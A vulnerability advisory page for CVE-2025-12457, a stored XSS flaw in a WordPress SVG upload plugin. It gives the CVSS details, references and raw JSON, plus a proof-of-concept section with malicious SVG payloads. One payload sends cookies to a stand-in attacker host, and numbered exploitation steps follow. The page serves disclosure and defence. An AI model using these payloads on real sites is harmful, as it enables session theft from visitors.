Security Vulnerability Report
CVE-2025-12457 CVSS 6.4 MEDIUM

CVE-2025-12457

Published: 2025-11-18 10:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Enable SVG, WebP, and ICO Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Enable SVG, WebP, and ICO Upload plugin ≤ 1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
SVG / XML
<!-- PoC: Malicious SVG file with embedded JavaScript -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script>alert('XSS via SVG');</script>
</svg>

<!-- Alternative PoC with event handler -->
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <image href="x" onerror="alert(document.domain)"/>
</svg>

<!-- Stealer PoC - Cookie stealing -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
  </script>
</svg>

<!-- Steps to exploit:
  1. Login to WordPress with Author+ privileges
  2. Navigate to Media Library -> Add New
  3. Upload the malicious SVG file
  4. Access the uploaded SVG file URL
  5. JavaScript will execute in victim's browser
-->

References

https://plugins.trac.wordpress.org/browser/enable-svg-webp-ico-upload/tags/1.1.2/includes/class-svg.php#L21
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396265%40enable-svg-webp-ico-upload&new=3396265%40enable-svg-webp-ico-upload&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/d5f267a5-012d-4b9a-a59d-9eccb04c557a?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12457", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:47.703", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Enable SVG, WebP, and ICO Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/enable-svg-webp-ico-upload/tags/1.1.2/includes/class-svg.php#L21", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396265%40enable-svg-webp-ico-upload&new=3396265%40enable-svg-webp-ico-upload&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d5f267a5-012d-4b9a-a59d-9eccb04c557a?source=cve", "source": "[email protected]"}]}}